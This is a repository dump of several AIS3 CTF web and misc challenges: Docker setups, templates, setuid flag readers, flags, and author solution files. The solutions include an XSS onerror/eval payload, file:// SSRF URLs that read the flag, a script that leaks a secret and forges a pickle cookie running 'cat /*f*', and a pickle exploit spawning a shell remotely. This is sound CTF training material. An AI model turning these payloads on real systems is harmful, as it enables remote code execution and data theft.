/ais3-eof/2022-quals/Web/gistmd/app/templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | GistMD 9 | 10 | 11 | 12 | 13 | {% block main %}{% endblock %} 14 |
15 |
16 |

© 2022 GistMD

17 |
18 | 19 | 20 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/app/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block main %} 3 |
4 |

GistMD

5 | 10 |
11 |
12 |
13 |

Note List

14 |
    15 | {% for note in notes %} 16 |
  1. 17 | {{ note.title }} / {{ note.note_id }} 18 |
  2. 19 | {% else %} 20 |

    (No notes found)

    21 | {% endfor %} 22 |
23 |
24 | {% endblock %} -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/app/templates/login.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block main %} 3 |
4 |

GistMD

5 |
6 | 7 | 8 | 9 |
10 | {% if error %}

{{ error }}

{% endif %} 11 |
12 | {% endblock %} -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/app/templates/new.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block main %} 3 |

Creating Note

4 |
5 | 8 |
9 | 10 |
11 |

12 |

13 | 14 | Note: You can use Markdown syntax to format your note. 15 | If you want to insert a Github Gist you can use {%gist username/gist_id %} format. 16 | 17 |

18 |
19 | {% endblock %} -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/app/templates/note.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block main %} 3 |

GistMD

4 |
5 | 11 | 12 | 15 | 16 | 22 |
23 |
Loading...
24 | 25 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | {% endblock %} -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/app/uwsgi.ini: -------------------------------------------------------------------------------- 1 | [uwsgi] 2 | module = main 3 | callable = app 4 | uid = 1000 5 | gid = 1000 6 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/bot/Dockerfile: -------------------------------------------------------------------------------- 1 | 2 | FROM python:3.9 3 | 4 | # I don't know why but only NTU mirror can install sid package of chromium 5 | RUN sed -i 's/deb.debian.org/debian.csie.ntu.edu.tw/' /etc/apt/sources.list 6 | RUN sed -i 's/security.debian.org/debian.csie.ntu.edu.tw/' /etc/apt/sources.list 7 | 8 | RUN apt update && \ 9 | apt install -y --no-install-recommends chromium-driver redis-server 10 | 11 | # Install latest chromium, I don't want this challenge become a browser pwn challenge 12 | RUN sed -i 's/bullseye /sid /' /etc/apt/sources.list 13 | RUN apt update && \ 14 | apt install -y --no-install-recommends chromium 15 | 16 | RUN rm -rf /var/lib/apt/lists/* 17 | 18 | RUN pip3 install --no-cache-dir selenium redis rq 19 | 20 | COPY xssbot.py /xssbot.py 21 | COPY run.sh /run.sh 22 | RUN chmod +x /run.sh 23 | 24 | RUN useradd --no-create-home --home-dir / --shell /bin/false user 25 | CMD bash /run.sh -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/bot/run.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | redis-server --protected-mode no & 3 | for _ in {1..4}; do 4 | rq worker & 5 | done 6 | sleep infinity 7 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/docker-compose.yml: 
-------------------------------------------------------------------------------- 1 | version: "3.5" 2 | 3 | x-share-env: &share-env 4 | ADMIN_PASSWORD: MVc-QjY43XnysjKoIsrhos8-ruMS42kzstMj9CvMB1Y 5 | 6 | services: 7 | web: 8 | depends_on: 9 | - xss-bot 10 | build: ./app 11 | volumes: 12 | - ./app/:/app 13 | ports: 14 | - 8001:80/tcp 15 | environment: 16 | FLAG: FLAG{?callback=xss.h4ck3r} 17 | RECAPTCHA_PRIVATE_KEY: 18 | <<: *share-env 19 | 20 | xss-bot: 21 | build: ./bot 22 | environment: 23 | <<: *share-env -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/exploit/easy-unintended.txt: -------------------------------------------------------------------------------- 1 | title: (your javascript payload) 2 | 3 |
{%gist a %}<img src=/ onerror=eval(GistMD.title)>
4 | 5 | first found by nella17@meow? 6 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/exploit/intended.py: -------------------------------------------------------------------------------- 1 | import secrets 2 | import requests 3 | 4 | BASE_URL = 'https://gist.splitl.in/' 5 | 6 | user = secrets.token_urlsafe(8) 7 | pwd = secrets.token_urlsafe(8) 8 | 9 | print(user, pwd) 10 | 11 | payload = ''' 12 | 13 | CLOBBERED 14 | 15 | {%gist schacon/1.json?callback=top.document.all[14].click# %} 16 | ''' 17 | req = requests.session() 18 | 19 | req.post(BASE_URL+'/login', data={'username': user, 'password': pwd}) 20 | 21 | r = req.post(BASE_URL+'/new', data={'title': 'a\nb','content': payload}, allow_redirects=True) 22 | 23 | print(r.url) 24 | 25 | 26 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:latest 2 | 3 | RUN mkdir -p /usr/src/app 4 | WORKDIR /usr/src/app 5 | COPY ./app . 
6 | 7 | RUN npm install 8 | 9 | CMD [ "node", "app.js" ] 10 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/app/flag.json: -------------------------------------------------------------------------------- 1 | "星🔵Starburst⚔️ꜱᴜᴛᴏʀɪᴍᴜ⚫爆" -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/app/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "body-parser": "^1.19.1", 4 | "ejs": "^3.1.6", 5 | "express": "^4.17.2", 6 | "sqlite3": "^5.0.2" 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/app/public/link-start.mp4: -------------------------------------------------------------------------------- 1 | // https://ani.gamer.com.tw/animeVideo.php?sn=926 -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/app/public/start.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/happy-metaverse-year/app/public/start.png -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/app/public/uso.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/happy-metaverse-year/app/public/uso.jpeg -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/app/public/welcome.mp4: 
-------------------------------------------------------------------------------- 1 | // https://ani.gamer.com.tw/animeVideo.php?sn=926 -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/app/public/welcome.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/happy-metaverse-year/app/public/welcome.png -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/app/views/failed.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | GG 9 | 17 | 18 | 19 | 20 | 21 |

You are not STARBURST enough.

22 | 23 | 24 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.5' 2 | 3 | services: 4 | web: 5 | build: . 6 | ports: 7 | - 8003:80/tcp 8 | user: "1000:1000" 9 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:8-apache 2 | 3 | # enable Apache rewrite module 4 | RUN a2enmod rewrite 5 | 6 | # Install php extensions 7 | RUN apt update && apt install -y libzip-dev && docker-php-ext-install zip 8 | 9 | # initialize the web application 10 | COPY ./src/ /var/www/ 11 | RUN chmod 1733 /var/www/html/uploads 12 | RUN chmod 1733 /tmp 13 | 14 | # install composer 15 | RUN curl -sS https://getcomposer.org/installer | php -- --install-dir=/usr/local/bin --filename=composer 16 | RUN cd /var/www/ && composer install 17 | 18 | # Set up flag & readflag for CTF 19 | COPY ./flag/readflag.c /readflag.c 20 | COPY ./flag/flag /flag 21 | RUN chmod 0400 /flag && chown root:root /flag 22 | RUN chmod 0444 /readflag.c && gcc /readflag.c -o /readflag 23 | RUN chown root:root /readflag && chmod 4555 /readflag 24 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.5' 2 | 3 | services: 4 | web: 5 | build: . 
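6 | ports: 7 | - 8000:80/tcp 8 |
--------------------------------------------------------------------------------
/ais3-eof/2022-quals/Web/imgura-album/flag/flag:
--------------------------------------------------------------------------------
FLAG{4lbums_pwn3ddd}
--------------------------------------------------------------------------------
/ais3-eof/2022-quals/Web/imgura-album/flag/readflag.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/*
 * setuid-root helper that prints /flag (installed 0400 root:root by the
 * Dockerfile). The caller must literally pass the four words
 * "give me the flag" as separate arguments.
 * Returns 0 on success, 1 on bad usage or any I/O failure.
 */
int main(int argc, char *argv[]) {
    /* Become root for real (the binary is installed 4555 root:root). The
     * return values are deliberately unchecked: if the escalation did not
     * happen, the fopen() below fails with EACCES and is reported there. */
    seteuid(0);
    setegid(0);
    setuid(0);
    setgid(0);

    if (argc < 5) {
        printf("Usage: %s give me the flag\n", argv[0]);
        return 1;
    }

    /* Equivalent to the original bitwise-OR of the strcmp() results, written
     * as a plain boolean chain for readability. */
    if (strcmp(argv[1], "give") != 0 || strcmp(argv[2], "me") != 0 ||
        strcmp(argv[3], "the") != 0 || strcmp(argv[4], "flag") != 0) {
        puts("You are not worthy");
        return 1;
    }

    char flag[256] = { 0 };
    FILE *fp = fopen("/flag", "r");
    if (!fp) {
        perror("fopen");
        return 1;
    }

    /* fread() returns size_t, so the former `< 0` check could never fire.
     * Read at most sizeof(flag) - 1 bytes so the buffer stays NUL-terminated
     * for puts() even when /flag is 256 bytes or longer. */
    size_t n = fread(flag, 1, sizeof(flag) - 1, fp);
    if (n == 0 && ferror(fp)) {
        perror("fread");
        fclose(fp);
        return 1;
    }
    flag[n] = '\0';

    puts(flag);
    fclose(fp);
    return 0;
}
--------------------------------------------------------------------------------
/ais3-eof/2022-quals/Web/imgura-album/src/composer.json:
--------------------------------------------------------------------------------
{
    "require": {
        "mikecao/flight": "^2.0"
    }
}
--------------------------------------------------------------------------------
/ais3-eof/2022-quals/Web/imgura-album/src/html/.htaccess:
--------------------------------------------------------------------------------
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php [QSA,L]
--------------------------------------------------------------------------------
/ais3-eof/2022-quals/Web/imgura-album/src/html/uploads/.htaccess: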
-------------------------------------------------------------------------------- 1 | # Deny all requests other than /uploads/[album-id]/[filename].{jpg,jpeg,png} 2 | 3 | RewriteCond %{REQUEST_URI} !^/uploads/([a-z0-9]{16})/.+(jpe?g|png)$ [NC] 4 | RewriteRule .* - [F,L] 5 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/src/lib/class.user.php: -------------------------------------------------------------------------------- 1 | username = $username; 9 | } 10 | 11 | public function getUsername() 12 | { 13 | return $this->username; 14 | } 15 | 16 | public function getAlbums() 17 | { 18 | return $this->albums; 19 | } 20 | 21 | public function addAlbum($album) 22 | { 23 | $this->albums[] = $album; 24 | } 25 | } -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/src/lib/inc.common.php: -------------------------------------------------------------------------------- 1 | 2 | 3 |

« Back


[+] Upload image for this album:

7 |
11 | 12 | 13 | listAll() as $file) : ?> 14 |
15 | <?= $file['name'] ?> 16 |
17 |
18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/src/views/footer.php: -------------------------------------------------------------------------------- 1 | 2 |
3 |
4 |

© Imgura Album

5 |
6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/src/views/header.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Imgura::Album 9 | 25 | 26 | 27 | 28 |

29 |
30 |
-------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/src/views/home.php: -------------------------------------------------------------------------------- 1 | 2 |

Welcome, @getUsername() ?>.

Home | Create new album 5 |

Your albums:

6 |
    7 | getAlbums() as $album) : ?> 8 |
  1. [Album]
  2. 9 | 10 |
11 | 12 | getAlbums())) : ?> 13 | (No albums found) 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/src/views/login.php: -------------------------------------------------------------------------------- 1 | 2 |
6 | 7 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/pm/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.0-fpm 2 | 3 | RUN apt-get update -y && apt-get install -y nginx 4 | 5 | RUN echo 'disable_functions = "shell_exec, system"' >> /usr/local/etc/php/conf.d/docker-php.ini; 6 | RUN echo 'max_execution_time = 3' >> /usr/local/etc/php/conf.d/docker-php.ini; 7 | RUN echo "request_terminate_timeout = 3" >> /usr/local/etc/php-fpm.d/www.conf; 8 | 9 | COPY nginx-site.conf /etc/nginx/sites-enabled/default 10 | COPY entrypoint.sh /etc/entrypoint.sh 11 | RUN chmod +x /etc/entrypoint.sh 12 | 13 | COPY ./src /var/www/html 14 | RUN chmod -R 755 /var/www/html 15 | RUN chown root:root /var/www/html 16 | 17 | WORKDIR /var/www/html 18 | 19 | # Set up flag & readflag for CTF 20 | COPY ./flag/readflag.c /readflag.c 21 | COPY ./flag/flag /flag 22 | RUN chmod 0400 /flag && chown root:root /flag 23 | RUN chmod 0444 /readflag.c && gcc /readflag.c -o /readflag 24 | RUN chown root:root /readflag && chmod 4555 /readflag 25 | 26 | EXPOSE 80 27 | ENTRYPOINT ["/etc/entrypoint.sh"] -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/pm/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.5' 2 | 3 | services: 4 | web: 5 | build: . 
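6 | ports: 7 | - 8005:80/tcp 8 |
--------------------------------------------------------------------------------
/ais3-eof/2022-quals/Web/pm/entrypoint.sh:
--------------------------------------------------------------------------------
#!/usr/bin/env bash
service nginx start
php-fpm
--------------------------------------------------------------------------------
/ais3-eof/2022-quals/Web/pm/exploit/solution.txt:
--------------------------------------------------------------------------------
just gopher ssrf -> fpm
old trick :D
there are a lot of exploits on the internet.

題目敘述四重雙關(嚴格來說是 C4取2 共六重):
[P]rogram [M]anagement
F[PM]
[P]eko[M]iko
[P]HP [M]alware
--------------------------------------------------------------------------------
/ais3-eof/2022-quals/Web/pm/flag/flag:
--------------------------------------------------------------------------------
FLAG{g0pher://finally a real ssrf challenge, and this should be a missing lab for edu-ctf students?}
--------------------------------------------------------------------------------
/ais3-eof/2022-quals/Web/pm/flag/readflag.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/*
 * setuid-root helper that prints /flag (installed 0400 root:root by the
 * Dockerfile). The caller must literally pass the four words
 * "give me the flag" as separate arguments.
 * Returns 0 on success, 1 on bad usage or any I/O failure.
 */
int main(int argc, char *argv[]) {
    /* Become root for real (the binary is installed 4555 root:root). The
     * return values are deliberately unchecked: if the escalation did not
     * happen, the fopen() below fails with EACCES and is reported there. */
    seteuid(0);
    setegid(0);
    setuid(0);
    setgid(0);

    if (argc < 5) {
        printf("Usage: %s give me the flag\n", argv[0]);
        return 1;
    }

    /* Equivalent to the original bitwise-OR of the strcmp() results, written
     * as a plain boolean chain for readability. */
    if (strcmp(argv[1], "give") != 0 || strcmp(argv[2], "me") != 0 ||
        strcmp(argv[3], "the") != 0 || strcmp(argv[4], "flag") != 0) {
        puts("You are not worthy");
        return 1;
    }

    char flag[256] = { 0 };
    FILE *fp = fopen("/flag", "r");
    if (!fp) {
        perror("fopen");
        return 1;
    }

    /* fread() returns size_t, so the former `< 0` check could never fire.
     * Read at most sizeof(flag) - 1 bytes so the buffer stays NUL-terminated
     * for puts() even when /flag is 256 bytes or longer. */
    size_t n = fread(flag, 1, sizeof(flag) - 1, fp);
    if (n == 0 && ferror(fp)) {
        perror("fread");
        fclose(fp);
        return 1;
    }
    flag[n] = '\0';

    puts(flag);
    fclose(fp);
    return 0;
}
--------------------------------------------------------------------------------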
/ais3-eof/2022-quals/Web/pm/nginx-site.conf: -------------------------------------------------------------------------------- 1 | server { 2 | root /var/www/html; 3 | include /etc/nginx/default.d/*.conf; 4 | 5 | index index.php index.html index.htm; 6 | 7 | client_max_body_size 30m; 8 | 9 | location / { 10 | try_files $uri $uri/ /index.php$is_args$args; 11 | } 12 | 13 | location ~ [^/]\.php(/|$) { 14 | fastcgi_split_path_info ^(.+?\.php)(/.*)$; 15 | fastcgi_param HTTP_PROXY ""; 16 | fastcgi_pass 127.0.0.1:9000; 17 | fastcgi_index index.php; 18 | fastcgi_keep_conn off; 19 | include fastcgi.conf; 20 | } 21 | } -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/pm/src/admin.php: -------------------------------------------------------------------------------- 1 | 被駭掉ㄌ wwwww 2 | 3 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/pm/src/phpinfo.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10 2 | 3 | RUN chmod 1733 /tmp 4 | 5 | RUN pip install --no-cache-dir bottle gunicorn 6 | 7 | RUN apt update && apt install -y --no-install-recommends nginx 8 | 9 | CMD ["bash", "/start.sh"] 10 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/app/configs/__init__.py: -------------------------------------------------------------------------------- 1 | secret = "cCySMEDJ9LOlStFzu-k9HE0XUZIkGlGqMkDOBHOldXI" 2 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/app/views/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 
4 | 5 | 6 | 7 | 8 | Document 9 | 10 | 11 | 12 |

Is this an SSRF challenge?

13 |
14 |

URLs you've tried...

15 |
    16 | % for item in payloads: 17 |
  1. {{item}}
  2. 18 | % end 19 | % if len(payloads) == 0: 20 |
  3. (Nothing yet.)
  4. 21 | % end 22 |
23 | 24 | 25 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.5' 2 | 3 | services: 4 | web: 5 | build: ./ 6 | volumes: 7 | - ./app/:/sup3rrrrr/secret/server/:ro 8 | - ./start.sh:/start.sh:ro 9 | - ./flag:/h3y_i_4m_th3_fl4ggg:ro 10 | - ./nginx.conf:/etc/nginx/sites-available/default:ro 11 | ports: 12 | - 8004:80/tcp 13 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/exploit/easy-unintended.txt: -------------------------------------------------------------------------------- 1 | 1. file://127.00000.00000.0001/proc/mounts 2 | 2. file://127.00000.00000.0001/h3y_i_4m_th3_fl4ggg 3 | 4 | 果然還是不該偷懶用 mount ㄉ 5 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/exploit/intended.py: -------------------------------------------------------------------------------- 1 | import secrets 2 | import requests 3 | import pickle 4 | import hmac 5 | import base64 6 | import hashlib 7 | 8 | import bottle 9 | 10 | BASE_URL = 'https://ssrf.h4ck3r.quest' 11 | 12 | req = requests.session() 13 | req.get(BASE_URL) # Get the cookie 14 | 15 | 16 | # get secret key 17 | secret = req.get(BASE_URL + '/proxy', 18 | params={'url': 'file://127.01/sup3rrrrr/secret/server/configs/__init__.py'}).text.split('=')[1].strip()[1:-1] 19 | 20 | print('secret =', secret) 21 | 22 | 23 | class Exploit: 24 | def __reduce__(self): 25 | return (eval, ('__import__("os").popen("cat /*f*").read()',)) 26 | 27 | 28 | exp = bottle.cookie_encode( 29 | ('session', {"payloads": [Exploit()]}), 30 | secret 31 | ).decode() 32 | 33 | print("cookie exploit =", exp) 34 | 35 | print(requests.get(BASE_URL, cookies={'session': exp}).text) 36 | 
-------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/flag: -------------------------------------------------------------------------------- 1 | FLAG{well, maybe not? XD} -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/nginx.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 80 default_server; 3 | server_name _; 4 | 5 | location / { 6 | include proxy_params; 7 | proxy_pass http://127.0.0.1:8000/; 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | nginx 4 | 5 | while true; do 6 | # 10 minutes 7 | timeout 600 gunicorn \ 8 | --workers 8 \ 9 | --access-logfile - \ 10 | --error-logfile - \ 11 | --bind 127.0.0.1:8000 \ 12 | --user 1000 \ 13 | --group 1000 \ 14 | --chdir /sup3rrrrr/secret/server/ \ 15 | main_server:app 16 | echo "Restarting server..." 
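17 | done 18 |
--------------------------------------------------------------------------------
/ais3-eof/2023-quals/misc-rce/Dockerfile:
--------------------------------------------------------------------------------
FROM tiangolo/uwsgi-nginx-flask:python3.10

COPY ./app /app

RUN echo "FLAG{this_is_a_fake_flag}" > /flag
RUN chmod 0400 /flag && chown root:root /flag
--------------------------------------------------------------------------------
/ais3-eof/2023-quals/misc-rce/app/app.py:
--------------------------------------------------------------------------------
from flask import Flask, request, send_file

import multiprocessing
import os

app = Flask(__name__)


def run(code):
    """Execute attacker-supplied Python in the pool worker and return its stdout.

    The exec() of untrusted input is the point of this challenge, not a bug.
    The only isolation visible in this file is the uid/gid drop to 65534 below
    plus the 1 s wall-clock limit enforced by do_exec(); anything readable by
    uid 65534 is reachable from the executed code.

    Args:
        code: Python source text (whatever the client sent as "code").
    Returns:
        Everything the code printed to stdout, as a str.
    Raises:
        Whatever exec() raises; the caller turns it into an error response.
    """
    # Drop the group first: once the uid is unprivileged, setgid() would fail.
    os.setgid(65534)
    os.setuid(65534)

    import contextlib
    import io
    with contextlib.redirect_stdout(io.StringIO()) as f:
        exec(code, {})
    return f.getvalue()


@app.route('/')
def index():
    """Serve the static front page."""
    return send_file('index.html')


@app.post('/exec')
def do_exec():
    """Run the submitted code in a one-process pool with a 1 s timeout.

    The pool is created per request and always torn down by the context
    manager (Pool.__exit__ calls terminate()), so a finished worker no longer
    lingers after a successful response; previously only the timeout path
    terminated it and every successful request leaked a process.

    Returns:
        (body, status): the code's stdout with 200, or an "err: ..." message
        with 500 on timeout or any exception raised by the code.
    """
    # silent=True yields None instead of a 400 for non-JSON bodies, and the
    # isinstance guard keeps a JSON array/scalar from raising outside the try.
    body = request.get_json(silent=True)
    code = body.get('code', '') if isinstance(body, dict) else ''
    with multiprocessing.Pool(processes=1) as p:
        result = p.apply_async(run, (code,))
        try:
            return str(result.get(timeout=1)), 200
        except multiprocessing.TimeoutError:
            return 'err: timeout', 500
        except Exception as e:
            return f"err: {e}", 500


if __name__ == '__main__':
    app.run()
--------------------------------------------------------------------------------
/ais3-eof/2023-quals/misc-rce/app/uwsgi.ini:
--------------------------------------------------------------------------------
[uwsgi]
module = app
callable = app
--------------------------------------------------------------------------------
/ais3-pre-exam/2021/Misc/cat-slayer-cloud/README.md:
--------------------------------------------------------------------------------
# Cat Slayer | Cloud Edition / Misc (500pts)
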
3 |
4 | 5 | ##### 【關於身為平凡高中生的我穿越成為異世界最強勇者在最終被魔王殺死後卻遇到女神獲得死亡回歸外掛再度轉生在第二人生無雙的那件事】 6 | 7 | `nc quiz.ais3.org 2222` 8 |
9 | 10 | --- 11 | 12 | **背景故事(與解題無關)** 13 | 14 | [[前情提要]](https://github.com/splitline/My-CTF-Challenges/tree/master/ais3-eof/2020-final/cat-slayer#background-story) 15 | 16 | 真是沒用啊我。我的這一生,沒打倒魔王也罷,連原世界都無法回去,再也無法見到家人們——尤其我那可愛的妹妹——一切就要這樣結束了嗎。 17 | 18 | / 19 | 20 | 「吶,冒險者,你醒了嗎?」 21 | 22 | 我微微的睜開眼,只見四周是一望無際的純白,而我似乎正坐在一張簡陋的木製椅上。 23 | 24 | 眼前的是一位少女,她身著一襲純白羽衣,雪白的長髮映襯了她紅潤的臉龐。等等,這劇本我熟悉,在第一次穿越時沒見到,這次死後總算見到了啊——所謂的「女神」。 25 | 26 | 她眨了眨那碧藍的雙眼,朝我緩緩走來,低頭翻了下手上的一疊文件,「你,看來是為了保護過馬路的小孩,而被迎面衝來的卡車撞死了呢。」 27 | 28 | 「?」 29 | 「呃,那不是我欸,我——」 30 | 31 | 「哦?」她打斷我的話,抬頭看了我一眼,清了下喉嚨,將文件翻了幾頁,「嗯,好,那麼,你看來是被隨機殺人的強盜刺殺而喪ㄇㄧㄥ⋯⋯」 32 | 33 | 「啊,那也不是我。」我擺了擺手。這女神到底來幹嘛的? 34 | 35 | 「嘖。」,她似乎露出了一絲的——不對,是很明顯的不耐煩,「所以說,你到底是怎麼來到這邊的啊,根據我上工這三個月的經驗隨便講這幾種理由都會中的說。」 36 | 37 | 「總之,我奮戰了一生,擊敗了無數的魔族,在最後的最後,被貓貓🐱魔王卡特路西法殺死了。」 38 | 39 | 「幹笑死那三小」 40 | 41 | 「?」 42 | 43 | 「?」 44 | 「沒,沒事。」她的身旁莫名其妙地開始散發出一圈圈金色光暈——嗯,好喔,不愧是女神——「冒險者啊,吾賜予你 死亡回歸 _Death Recursion_ 的能力,回到你所來的世界,再度向命運挑戰吧。」 45 | 46 | 「欸等——」 47 | 48 | 她話音剛落,我便瞬間進入了一道白光之中,看來我是要再度回去那個世界了呢。 49 | 50 | 繼續前進吧,我的*究極の闇黑の貓貓🐱の戰紀*。 51 | 52 | Author: splitline -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-cloud/deploy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8 2 | 3 | RUN pip install pycryptodome 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m cat_slayer_cloud 7 | COPY ./share /home/cat_slayer_cloud 8 | COPY ./xinetd /etc/xinetd.d/cat_slayer_cloud 9 | COPY ./flag "/#h3y_I'm_the_fl4ggg#" 10 | RUN chown -R root:root /home/cat_slayer_cloud 11 | RUN chmod -R 755 /home/cat_slayer_cloud 12 | 13 | CMD ["/usr/sbin/xinetd","-dontfork"] -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-cloud/deploy/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | cat-slayer-cloud: 3 | build: ./ 4 | ports: 5 | - 
"2222:2222" 6 | expose: 7 | - "2222" 8 | environment: 9 | - KEY=EnR3vCSX7PFyCzekBVAMMIK0jICLL1Mx 10 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-cloud/deploy/flag: -------------------------------------------------------------------------------- 1 | AIS3{mag1c_pick13_cut&paste} -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-cloud/deploy/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/cat_slayer_cloud/game.py 5 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-cloud/deploy/xinetd: -------------------------------------------------------------------------------- 1 | service cat_slayer_cloud 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/cat_slayer_cloud/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = cat_slayer_cloud 10 | bind = 0.0.0.0 11 | port = 2222 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | flags = REUSE 16 | } -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-cloud/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import pickle 3 | 4 | p = remote('quiz.ais3.org', 2222) 5 | 6 | # Original Pickle: b'\x80\x04U\x02osU\x06system\x93U\x02sh\x85R.' 7 | ''' 8 | 0: \x80 PROTO 4 9 | 2: U SHORT_BINSTRING 'os' 10 | 6: U SHORT_BINSTRING 'system' 11 | 14: \x93 STACK_GLOBAL 12 | 15: U SHORT_BINSTRING 'sh' 13 | 19: \x85 TUPLE1 14 | 20: R REDUCE 15 | 21: . 
